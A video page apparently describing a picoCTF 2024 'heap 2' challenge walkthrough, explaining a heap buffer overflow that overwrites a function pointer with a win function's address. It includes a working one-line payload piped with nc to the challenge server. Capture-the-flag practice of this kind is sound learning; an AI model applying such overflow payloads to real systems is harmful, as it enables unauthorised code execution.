Back to Browse

pico2024 heap 2

2.3K views
Jun 17, 2024
5:37

Another heap buffer overflow. This time we need to put the address of the function win into a function pointer (in little endian order). python2 -c "print '2'; print 'pico'*8+'\xa0\x11\x40\x00'; print '4'" | nc mimas.picoctf.net 49784

Download

0 formats

No download links available.

pico2024 heap 2 | NatokHD